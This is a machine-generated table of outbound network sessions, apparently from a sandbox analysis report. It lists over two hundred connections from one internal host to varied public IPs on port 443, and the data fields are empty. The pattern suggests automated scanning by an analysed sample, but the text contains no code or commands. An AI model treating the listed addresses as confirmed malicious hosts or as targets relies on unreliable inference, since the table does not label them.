                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15805192.168.2.135444658.249.37.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15806192.168.2.1354066126.41.228.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15807192.168.2.1359968162.198.235.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15808192.168.2.1333018179.17.139.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15809192.168.2.135968444.66.51.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15810192.168.2.1342530166.128.22.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15811192.168.2.134199448.226.172.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15812192.168.2.133994840.13.209.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15813192.168.2.1339270181.92.156.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15814192.168.2.134863299.229.140.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15815192.168.2.133681836.0.57.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15816192.168.2.1338260217.92.65.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15817192.168.2.1340570216.75.109.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15818192.168.2.1344818113.171.20.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15819192.168.2.135201019.61.112.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15820192.168.2.1347694138.161.173.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15821192.168.2.134210632.35.174.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15822192.168.2.1360892144.99.241.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15823192.168.2.1348764106.134.176.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15824192.168.2.1334776112.143.177.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15825192.168.2.1334762119.172.132.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15826192.168.2.135418037.220.214.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15827192.168.2.1349748211.149.175.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15828192.168.2.13503842.159.80.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15829192.168.2.1356944131.109.6.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15830192.168.2.1355388152.105.245.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15831192.168.2.1341136219.238.151.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15832192.168.2.135384832.34.145.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15833192.168.2.1347390193.26.199.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15834192.168.2.1360420194.85.16.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15835192.168.2.1339810168.27.20.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15836192.168.2.135266645.136.21.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15837192.168.2.134669869.204.105.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15838192.168.2.1341006211.152.189.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15839192.168.2.1335056192.179.204.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15840192.168.2.1347118154.218.42.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15841192.168.2.1352266221.43.96.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15842192.168.2.134772260.217.120.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15843192.168.2.1348934125.208.101.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15844192.168.2.134761620.37.237.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15845192.168.2.134312476.79.223.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15846192.168.2.1347496151.234.99.199443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15847192.168.2.1347280112.30.38.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15848192.168.2.134508063.118.154.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15849192.168.2.13574848.60.30.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15850192.168.2.1335260159.228.86.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15851192.168.2.1345352150.40.232.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15852192.168.2.1340496209.201.166.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15853192.168.2.1337300156.224.87.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15854192.168.2.135980438.43.131.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15855192.168.2.1351716143.104.156.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15856192.168.2.1338044113.79.17.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15857192.168.2.1350256108.135.185.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15858192.168.2.1333512217.141.66.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15859192.168.2.1355090178.54.83.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15860192.168.2.135021080.223.37.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15861192.168.2.1348426171.249.171.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15862192.168.2.1342030134.96.37.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15863192.168.2.1351058201.82.169.204443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15864192.168.2.1339110101.237.22.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15865192.168.2.1336740217.191.185.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15866192.168.2.135756483.90.119.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15867192.168.2.1340766126.86.202.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15868192.168.2.133949884.149.80.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15869192.168.2.133386687.36.44.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15870192.168.2.1352846142.192.187.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15871192.168.2.1359808145.163.218.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15872192.168.2.1349810202.64.222.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15873192.168.2.1358946143.48.35.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15874192.168.2.1343006222.111.79.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15875192.168.2.1354062207.109.120.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15876192.168.2.135545096.138.107.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15877192.168.2.134950836.115.141.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15878192.168.2.1351144143.48.32.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15879192.168.2.1351698112.220.76.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15880192.168.2.134028489.63.195.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15881192.168.2.135337660.151.93.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15882192.168.2.1349314189.162.71.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15883192.168.2.1344194222.0.72.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15884192.168.2.133367238.70.130.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15885192.168.2.133721031.238.92.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15886192.168.2.134914831.148.62.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15887192.168.2.134573483.177.42.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15888192.168.2.135771081.227.96.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15889192.168.2.1354372114.156.207.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15890192.168.2.1334986168.17.116.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15891192.168.2.1335090216.108.53.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15892192.168.2.136097253.9.129.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15893192.168.2.134979248.219.92.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15894192.168.2.135718861.165.73.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15895192.168.2.1354040128.214.170.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15896192.168.2.134827499.119.63.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15897192.168.2.1333554152.72.239.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15898192.168.2.133539082.15.132.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15899192.168.2.1337632116.189.89.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15900192.168.2.1343786219.231.142.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15901192.168.2.1349096114.225.86.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15902192.168.2.1344778208.207.190.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15903192.168.2.1334948172.165.238.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15904192.168.2.1342708116.183.16.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15905192.168.2.1347196162.253.82.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15906192.168.2.13604821.123.250.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15907192.168.2.1336788200.93.184.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15908192.168.2.135988098.38.54.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15909192.168.2.1350076195.0.237.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15910192.168.2.133626865.77.7.49443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15911192.168.2.134429413.146.234.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15912192.168.2.1341348109.106.2.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15913192.168.2.1354998142.145.116.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15914192.168.2.1350532181.86.229.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15915192.168.2.135067698.202.58.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15916192.168.2.1340798211.90.81.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15917192.168.2.1352784185.29.201.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15918192.168.2.134737451.92.200.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15919192.168.2.1354866173.115.71.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15920192.168.2.1341060113.76.83.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15921192.168.2.1338236112.155.115.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15922192.168.2.1337066186.176.106.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15923192.168.2.135745893.52.153.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15924192.168.2.1347364149.20.196.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15925192.168.2.134968234.127.204.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15926192.168.2.1344182189.91.255.246443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15927192.168.2.1338732156.187.86.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15928192.168.2.134512268.127.137.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15929192.168.2.13596342.36.172.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15930192.168.2.1356756160.235.130.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15931192.168.2.133754614.211.97.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15932192.168.2.1353600129.150.85.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15933192.168.2.134505214.88.46.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15934192.168.2.1354246176.187.135.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15935192.168.2.1338074161.11.157.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15936192.168.2.1333828157.109.147.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15937192.168.2.1335132137.16.54.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15938192.168.2.136055246.90.241.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15939192.168.2.13456584.53.118.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15940192.168.2.1348718111.130.143.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15941192.168.2.1348168158.233.93.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15942192.168.2.1338590140.140.56.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15943192.168.2.1335048201.50.251.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15944192.168.2.1334342160.57.240.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15945192.168.2.1340034123.213.187.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15946192.168.2.133282098.195.192.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15947192.168.2.1337126131.71.221.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15948192.168.2.1348780163.213.140.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15949192.168.2.1337006148.232.58.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15950192.168.2.1341856122.108.75.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15951192.168.2.1359804108.47.154.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15952192.168.2.1343084122.210.11.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15953192.168.2.134458476.34.238.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15954192.168.2.1352954153.152.86.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15955192.168.2.1342812106.83.184.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15956192.168.2.133664445.116.179.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15957192.168.2.134812674.132.2.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15958192.168.2.134532850.79.177.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15959192.168.2.1360264218.242.192.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15960192.168.2.1335256125.77.227.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15961192.168.2.134807866.172.216.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15962192.168.2.1338250114.45.138.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15963192.168.2.1355702126.159.109.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15964192.168.2.1357614195.71.33.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15965192.168.2.1346072157.182.171.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15966192.168.2.1346088165.171.192.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15967192.168.2.134701835.247.126.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15968192.168.2.135742670.212.235.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15969192.168.2.1346062158.87.188.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15970192.168.2.134669062.249.29.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15971192.168.2.1341760181.72.2.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15972192.168.2.135933040.164.210.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15973192.168.2.1338892103.228.86.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15974192.168.2.1357562202.46.129.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15975192.168.2.1355430171.55.198.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15976192.168.2.1342580100.218.97.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15977192.168.2.13535988.170.46.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15978192.168.2.1336098138.79.44.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15979192.168.2.134730491.112.159.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15980192.168.2.1360476211.240.65.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15981192.168.2.135793820.118.142.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15982192.168.2.1337860222.239.137.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15983192.168.2.1348784206.174.168.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15984192.168.2.133517031.128.19.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15985192.168.2.135142699.40.194.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15986192.168.2.134657286.42.183.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15987192.168.2.1337612126.157.137.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15988192.168.2.134872254.141.93.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15989192.168.2.135659084.140.149.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15990192.168.2.135206880.31.253.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15991192.168.2.134107837.153.136.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15992192.168.2.1354764122.44.200.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15993192.168.2.1360208156.68.244.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15994192.168.2.133446685.30.4.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15995192.168.2.134926425.69.95.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15996192.168.2.1349494145.39.70.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15997192.168.2.1337808198.1.175.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15998192.168.2.1340498182.131.253.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15999192.168.2.1353320150.67.120.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16000192.168.2.1335410175.100.198.38443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16001192.168.2.1357484191.8.167.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16002192.168.2.1350006167.64.209.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16003192.168.2.1337560217.252.101.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16004192.168.2.133656823.137.251.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16005192.168.2.1344702197.57.166.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16006192.168.2.1356856190.206.152.23443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16007192.168.2.1360046185.182.72.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16008192.168.2.133911268.254.11.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16009192.168.2.1337852212.151.195.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16010192.168.2.1334630117.163.144.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16011192.168.2.1349342153.131.134.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16012192.168.2.134739238.12.246.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16013192.168.2.135007280.22.249.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16014192.168.2.1335400206.125.9.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16015192.168.2.1359934207.43.212.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  16016192.168.2.1357330140.16.187.242443
                                                  TimestampBytes transferredDirectionData


